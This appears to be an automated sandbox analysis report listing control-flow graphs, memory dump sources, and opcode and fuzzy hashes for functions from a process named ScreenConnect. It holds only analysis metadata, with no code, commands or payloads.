                                                                                                                                                                                                                                                                          control_flow_graph 708 7ff849250395-7ff8492503c8 712 7ff8492503ca-7ff849250413 708->712 713 7ff849250414-7ff84925048e 708->713 712->713 726 7ff8492504d8-7ff849250500 713->726 727 7ff849250490-7ff8492504c6 713->727 732 7ff849250524-7ff84925053c 726->732 733 7ff849250502-7ff849250521 726->733 737 7ff84925053e-7ff84925055d 732->737 738 7ff849250560-7ff84925057e 732->738 737->738 742 7ff84925059a 738->742 743 7ff849250580-7ff849250590 738->743 745 7ff84925059f-7ff8492505a5 742->745 746 7ff849250597-7ff849250598 743->746 747 7ff84925063e-7ff849250641 745->747 748 7ff8492505ab-7ff8492505b4 745->748 746->742 751 7ff849250698-7ff84925069f 747->751 752 7ff849250643-7ff84925064d 747->752 749 7ff8492505cd-7ff8492505d8 748->749 750 7ff8492505b6-7ff8492505c3 748->750 754 7ff8492505da-7ff8492505f7 749->754 755 7ff849250624-7ff849250630 749->755 750->749 758 7ff8492505c5-7ff8492505cb 750->758 761 7ff8492506e6-7ff8492506ea 751->761 762 7ff8492506a1-7ff8492506b6 751->762 759 7ff849250655-7ff84925066e 752->759 763 7ff8492505fd-7ff849250622 754->763 764 7ff8492508e2-7ff849250921 754->764 755->747 758->749 770 7ff8492506df-7ff8492506e1 759->770 771 7ff849250670-7ff849250672 759->771 765 7ff8492506eb-7ff8492506ec 761->765 775 7ff8492506ba-7ff8492506c6 762->775 776 7ff849250800-7ff84925081e 762->776 763->755 783 7ff849250923-7ff849250931 764->783 774 7ff8492506ee-7ff8492506fa 765->774 770->761 771->774 778 7ff849250674 771->778 779 7ff8492506fc-7ff8492506fe 774->779 780 7ff849250700-7ff849250701 774->780 781 7ff8492506cc-7ff8492506da call 7ff849250078 775->781 782 7ff8492506c8-7ff8492506ca 775->782 805 7ff8492508bd-7ff8492508df 776->805 806 7ff849250824-7ff84925082e 776->806 778->775 784 7ff849250676-7ff84925067a 778->784 786 7ff849250711-7ff849250715 779->786 787 7ff849250702-7ff84925070e call 7ff849250078 780->787 788 7ff8492506dd-7ff8492506de 781->788 782->788 796 7ff849250938-7ff84925093f 783->796 784->765 791 7ff84925067c-7ff849250681 784->791 794 7ff849250716-7ff84925072e 786->794 787->786 788->770 791->787 792 7ff849250683-7ff84925068e 791->792 797 7ff8492506ff 792->797 798 7ff849250690-7ff849250695 792->798 811 7ff849250734-7ff849250742 call 7ff849250078 794->811 812 7ff849250730-7ff849250732 794->812 801 7ff84925094b-7ff849250952 796->801 802 7ff849250941-7ff84925094a 796->802 797->780 798->794 803 7ff849250697 798->803 807 7ff84925095e-7ff849250969 801->807 808 7ff849250954-7ff84925095d 801->808 803->751 805->764 813 7ff849250834-7ff849250842 call 7ff849250078 806->813 814 7ff849250830-7ff849250832 806->814 818 7ff849250745-7ff849250762 811->818 812->818 816 7ff849250845-7ff849250862 813->816 814->816 825 7ff849250868-7ff849250876 call 7ff849250078 816->825 826 7ff849250864-7ff849250866 816->826 823 7ff849250768-7ff849250776 call 7ff849250078 818->823 824 7ff849250764-7ff849250766 818->824 827 7ff849250779-7ff84925078f 823->827 824->827 829 7ff849250879-7ff849250896 825->829 826->829 835 7ff8492507a6-7ff8492507ad 827->835 836 7ff849250791-7ff8492507a4 call 7ff849250078 827->836 837 7ff84925089c-7ff8492508aa call 7ff849250078 829->837 838 7ff849250898-7ff84925089a 829->838 843 7ff8492507b4-7ff8492507c7 835->843 836->835 845 7ff8492507cd-7ff8492507d0 836->845 840 7ff8492508ad-7ff8492508b6 837->840 838->840 840->805 843->845 846 7ff8492507e7-7ff8492507fa 845->846 847 7ff8492507d2-7ff8492507e5 call 7ff849250078 845->847 846->776 847->776 847->846
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: x$$I$x&$I
                                                                                                                                                                                                                                                                          • API String ID: 0-2601090195
                                                                                                                                                                                                                                                                          • Opcode ID: 3f112afa0485c325b7e2eaf2c470a226b9e8de731b4c83dffb6754af11b93f19
                                                                                                                                                                                                                                                                          • Instruction ID: 5a5695dc770b52d2df498b9b648a2bf9e3e8a90918c68c97b7b83cb4d099f2fb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f112afa0485c325b7e2eaf2c470a226b9e8de731b4c83dffb6754af11b93f19
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF121671A4DAAA4FF7A8FE2C98556B577D1FFA53A0F0400B9D05DC7193DD28AC068340
                                                                                                                                                                                                                                                                          Function 00007FF849254CF5 Relevance: 2.9, Strings: 2, Instructions: 406COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1010 7ff849254cf5-7ff849254d01 1011 7ff849254d05-7ff849254d21 1010->1011 1012 7ff849254d03 1010->1012 1016 7ff849254d28-7ff849254d2a 1011->1016 1012->1011 1013 7ff849254d45-7ff849254d4b 1012->1013 1014 7ff849254d4d-7ff849254d62 1013->1014 1015 7ff849254d64-7ff849254d79 1013->1015 1014->1015 1022 7ff849254d7b-7ff849254db6 1015->1022 1023 7ff849254dc3-7ff849254e02 1015->1023 1019 7ff849254db9-7ff849254dc2 1016->1019 1020 7ff849254d30-7ff849254d43 1016->1020 1020->1013 1022->1019 1027 7ff849254e4c-7ff849254e4f 1023->1027 1028 7ff849254e04-7ff849254e1b 1023->1028 1031 7ff849254ecb 1027->1031 1032 7ff849254e51 1027->1032 1034 7ff849255038-7ff84925504a 1028->1034 1035 7ff849254e21-7ff849254e27 1028->1035 1038 7ff849254ecc-7ff849254ed6 1031->1038 1036 7ff849254e97-7ff849254ea4 1032->1036 1037 7ff849254e53-7ff849254e5b 1032->1037 1035->1034 1039 7ff849254e2d-7ff849254e33 1035->1039 1040 7ff849254ea7-7ff849254eb9 1036->1040 1037->1038 1041 7ff849254e5d-7ff849254e5f 1037->1041 1052 7ff849254ed8 1038->1052 1039->1034 1042 7ff849254e39-7ff849254e3f 1039->1042 1049 7ff849254ebb 1040->1049 1050 7ff849254e91-7ff849254e92 1040->1050 1044 7ff849254edb-7ff849254ee4 1041->1044 1045 7ff849254e61 1041->1045 1042->1034 1048 7ff849254e45-7ff849254e4b 1042->1048 1047 7ff849254ee6-7ff849254eed 1044->1047 1045->1040 1051 7ff849254e63-7ff849254e67 1045->1051 1053 7ff849254eef-7ff849254ef8 1047->1053 1048->1027 1055 7ff849254ebc-7ff849254eca 1048->1055 1049->1055 1050->1034 1054 7ff849254e94 1050->1054 1051->1052 1056 7ff849254e69-7ff849254e6e 1051->1056 1052->1044 1059 7ff849254efd-7ff849254f18 1053->1059 1054->1036 1055->1031 1056->1053 1057 7ff849254e70-7ff849254e75 1056->1057 1057->1047 1058 7ff849254e77-7ff849254e7c 1057->1058 1058->1059 1060 7ff849254e7e-7ff849254e90 1058->1060 1059->1034 1064 7ff849254f1e-7ff849254f24 1059->1064 1060->1050 1064->1034 1065 7ff849254f2a-7ff849254f30 1064->1065 1065->1034 1066 7ff849254f36-7ff849254f3c 1065->1066 1066->1034 1067 7ff849254f42-7ff849254fc2 1066->1067 1067->1034 1076 7ff849254fc4-7ff849254fd9 call 7ff849253d10 1067->1076 1079 7ff849254fde-7ff849254fe0 1076->1079 1079->1034 1080 7ff849254fe2-7ff849254ffe call 7ff849253d10 1079->1080 1080->1034 1084 7ff849255000-7ff849255008 1080->1084 1084->1034 1085 7ff84925500a-7ff849255037 call 7ff849253d10 1084->1085
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: x$$I$x&$I
                                                                                                                                                                                                                                                                          • API String ID: 0-2601090195
                                                                                                                                                                                                                                                                          • Opcode ID: 472994bba11c330beb3039bac2b26a3652ed85cc50ebc6b404685e8b0d64691e
                                                                                                                                                                                                                                                                          • Instruction ID: 2245f93883afd256c53385df8ee625412b0c55884531305ab496432d9e18eba2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 472994bba11c330beb3039bac2b26a3652ed85cc50ebc6b404685e8b0d64691e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4C14B31A0EDA75FFB69FE2894418B5B7E1EF553A0B4401B9C45E87587EE15F80A83C0
                                                                                                                                                                                                                                                                          Function 00007FF848F48014 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3287363648.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7c902712f425c52401a9452800e31a53e87321f6164a52e93347e50a645c099e
                                                                                                                                                                                                                                                                          • Instruction ID: 6321b0231d45d8a79023bd59d804d0b86874f266644c33704a4bf9b72d1c8cdd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c902712f425c52401a9452800e31a53e87321f6164a52e93347e50a645c099e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E41563191CB488FEB14AFA8984A5E97BF0EF65750F04017FE049C3292DF68A846CB95
                                                                                                                                                                                                                                                                          Function 00007FF849254585 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1221 7ff849254585-7ff8492545c3 1224 7ff8492545cb-7ff8492545d9 1221->1224 1225 7ff8492545db-7ff8492545f8 1224->1225 1226 7ff849254621-7ff849254630 1224->1226 1229 7ff8492545fa-7ff84925461f 1225->1229 1230 7ff849254641-7ff84925466a 1225->1230 1231 7ff84925466d-7ff849254692 1226->1231 1232 7ff849254632-7ff84925463e 1226->1232 1229->1226 1230->1231 1232->1230
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: `;%I
                                                                                                                                                                                                                                                                          • API String ID: 0-3585018813
                                                                                                                                                                                                                                                                          • Opcode ID: 8e5378717e12a9cad0d37c8417bb93a8634d9c6b9991e0ddfb5b674954125db1
                                                                                                                                                                                                                                                                          • Instruction ID: ad2e9ddce7a11adbd0ec741334e0f430919573207ae5633c533e32cfc0dc5619
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e5378717e12a9cad0d37c8417bb93a8634d9c6b9991e0ddfb5b674954125db1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631FC52D1EAE64FF356AB3858691A4FFE0EF6239071D45FBC088CB1D7D919580A8311
                                                                                                                                                                                                                                                                          Function 00007FF849253CF0 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1647 7ff849253cf0-7ff849253d08 1650 7ff849253d0c-7ff849253ddc 1647->1650 1651 7ff849253d0a-7ff849253d0b 1647->1651 1666 7ff849253dde-7ff849253de4 1650->1666 1667 7ff849253de7-7ff849253f1d call 7ff849251470 * 2 1650->1667 1651->1650 1666->1667 1685 7ff849253f1f-7ff849253f4d 1667->1685 1686 7ff849253f59 1667->1686 1688 7ff849253f54-7ff849253f57 1685->1688 1687 7ff849253f5e-7ff849253f8e 1686->1687 1689 7ff849253f94-7ff849253f9c 1687->1689 1690 7ff849254040-7ff84925404a 1687->1690 1688->1687 1692 7ff8492540d1-7ff8492540d9 1689->1692 1693 7ff849253fa2-7ff849253fad 1689->1693 1691 7ff849254050-7ff849254071 call 7ff849250c30 * 2 1690->1691 1690->1692 1691->1692 1702 7ff849254073-7ff8492540aa 1691->1702 1693->1689 1697 7ff849253faf-7ff849254007 call 7ff849253ac0 1693->1697 1707 7ff84925400d-7ff84925403d 1697->1707 1708 7ff8492540da-7ff84925410a 1697->1708 1702->1692 1706 7ff8492540ac-7ff8492540c9 1702->1706 1706->1692 1707->1690
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9ccc4f07b30e324ccbb8fe8ef621a15c9a8bb7c84589a5dab9cbf3d73f4c3464
                                                                                                                                                                                                                                                                          • Instruction ID: ffdf77fbc42d118bd7177adb512f4bd63cc538abe00bcef3aad1b05e208f44e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ccc4f07b30e324ccbb8fe8ef621a15c9a8bb7c84589a5dab9cbf3d73f4c3464
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69E1FA3190EB968FE799FF28D4916E1BBB0FF55358B2405BAC058CF187CA29E846C750
                                                                                                                                                                                                                                                                          Function 00007FF849253D00 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ce323e4094f3bddca977d66892e08aab8b541402f1fcd49d8bfdcc7b69c42881
                                                                                                                                                                                                                                                                          • Instruction ID: c275175259e4a76f4f361655d49d8c4f93e916a1b9e6ecb0bb7ee302e1e96b62
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce323e4094f3bddca977d66892e08aab8b541402f1fcd49d8bfdcc7b69c42881
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87C1E73190EB969FE799FF28D4916E1BBB0FF55358B1405B6C098CF187CA28E846C790
                                                                                                                                                                                                                                                                          Function 00007FF849255E4C Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5b3fec13ba7d44bb0e66f6f84fc0c89c6cd6bf783a2c12b316b123fb3e994e53
                                                                                                                                                                                                                                                                          • Instruction ID: a46c30a2ef8159bff7ffc11189cece541ae1f3b39137e70b95ecd0041baf7166
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3fec13ba7d44bb0e66f6f84fc0c89c6cd6bf783a2c12b316b123fb3e994e53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A811331E1DAE74EFBB9BE2844516B5A7D1EF647E0F0841B9C86DC72C7DE28A9058340
                                                                                                                                                                                                                                                                          Function 00007FF849253DE8 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4e3a76116fdc0755ea3affc99f7e7c899ffe2c94464217d381bee4eb4fbaadca
                                                                                                                                                                                                                                                                          • Instruction ID: c664799c8e2bdd44e83a76b0d9497ed878f247aabd8aa27f26777721fc461569
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e3a76116fdc0755ea3affc99f7e7c899ffe2c94464217d381bee4eb4fbaadca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C281C43590EA968FE7D9FF28D4906E1B7A1FF55358B2405B9C05CCF187CA28E846C790
                                                                                                                                                                                                                                                                          Function 00007FF849250636 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b47b549159716b847fcddd550a1574eba0513adf63134d57ae18f38d7fc06ec2
                                                                                                                                                                                                                                                                          • Instruction ID: 92f05bbca11f94b333a5236ca6abccd244100b074f509a391eca316541e626a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b47b549159716b847fcddd550a1574eba0513adf63134d57ae18f38d7fc06ec2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F712870A6CA5A8FEBA8FF18C895BA573D1FF68351F500078E45EC7292DE68E8058740
                                                                                                                                                                                                                                                                          Function 00007FF849256B37 Relevance: .2, Instructions: 234COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d3db57d23b27e9fb77a04bf2c5e84e007fda30a127a376f801ae46978d0caab6
                                                                                                                                                                                                                                                                          • Instruction ID: 3046e11f36916f4430622da0f6a36bc4b7a64c008a7cd9e3f58f5de5ca7ef493
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3db57d23b27e9fb77a04bf2c5e84e007fda30a127a376f801ae46978d0caab6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B171A631E1DD678EFB79BF2880546B9A2D2FFA47D5F500439D02ED32C2DE29B9468244
                                                                                                                                                                                                                                                                          Function 00007FF84925824D Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5902a1b4719b468f8ca92687ef247fb972bf0ab1c587016afcba5827b7e2929c
                                                                                                                                                                                                                                                                          • Instruction ID: b5a287176d750fa965827a5ce4fc90f198b92e9659ac71d9c7dc29d762eaf680
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5902a1b4719b468f8ca92687ef247fb972bf0ab1c587016afcba5827b7e2929c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3514732E0D9DA9FF765FF28A8510B9BBE1EF94360B04057AD45CC3192DF6868068381
                                                                                                                                                                                                                                                                          Function 00007FF8492512D1 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 17ada5665c1efcffe80033771d76f718b8150c8d18407942a3f721d5871689b1
                                                                                                                                                                                                                                                                          • Instruction ID: 2595e8e1b5d10a5db4bf4db72622f45ddd91c18cc0ae1ac3cf345840c0551a63
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ada5665c1efcffe80033771d76f718b8150c8d18407942a3f721d5871689b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41B573C0E6E66FF321EE38A4A18F5BB90FF126ADB1901B7C0585B493DD19B806C651
                                                                                                                                                                                                                                                                          Function 00007FF8492512E7 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e3735422030f759c389fc257bfe8185634cdb8a0d12cbfb76f32f86ecdcbd822
                                                                                                                                                                                                                                                                          • Instruction ID: 8b8f92ce38b70620653c3d351795a50a79fb094a5ed33be3251a7a7fc93a23f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3735422030f759c389fc257bfe8185634cdb8a0d12cbfb76f32f86ecdcbd822
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10319632C0E6A5AFE751FF3CE4A15E57BA0FF122ACB1901B6C0588A053DE1DB846C755
                                                                                                                                                                                                                                                                          Function 00007FF84925840A Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6768fc0b91e255f79dea0f047532a3e24574cbae49d7f710750c2af9b5f73d7d
                                                                                                                                                                                                                                                                          • Instruction ID: 30d892fc4b302963ec0a286387488c87846b9c47e2edcb2b6f265b92ced1cdd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6768fc0b91e255f79dea0f047532a3e24574cbae49d7f710750c2af9b5f73d7d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2821493190DAC94FE7A5AB3498040A6BBF1FF853A0B0406BAD49DC3192DF6CAC46C351
                                                                                                                                                                                                                                                                          Function 00007FF849253A55 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: bf2331d55a162548be842a4f2d4e5fbba570d21839654eb1f1b7c95837ebde7b
                                                                                                                                                                                                                                                                          • Instruction ID: df976ebcdf98d4b0c6ab45d93a7df296cbfa2b15b346b2864785c73cc93b4b34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf2331d55a162548be842a4f2d4e5fbba570d21839654eb1f1b7c95837ebde7b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A21B33254E3D5AFD307AB68D8659D67FB0EF8726470901E7D089CB0B3C61D584AC7A1
                                                                                                                                                                                                                                                                          Function 00007FF849257779 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3294292731.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d442af5b1bfe28ecee07c15f304eee27bb41856ef71a58d443d7d50c2fa165e6
                                                                                                                                                                                                                                                                          • Instruction ID: 8c3d6a0996e6b9180bafdc654ba6b41a02c12be28609942a6061204b8ff0c145
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d442af5b1bfe28ecee07c15f304eee27bb41856ef71a58d443d7d50c2fa165e6
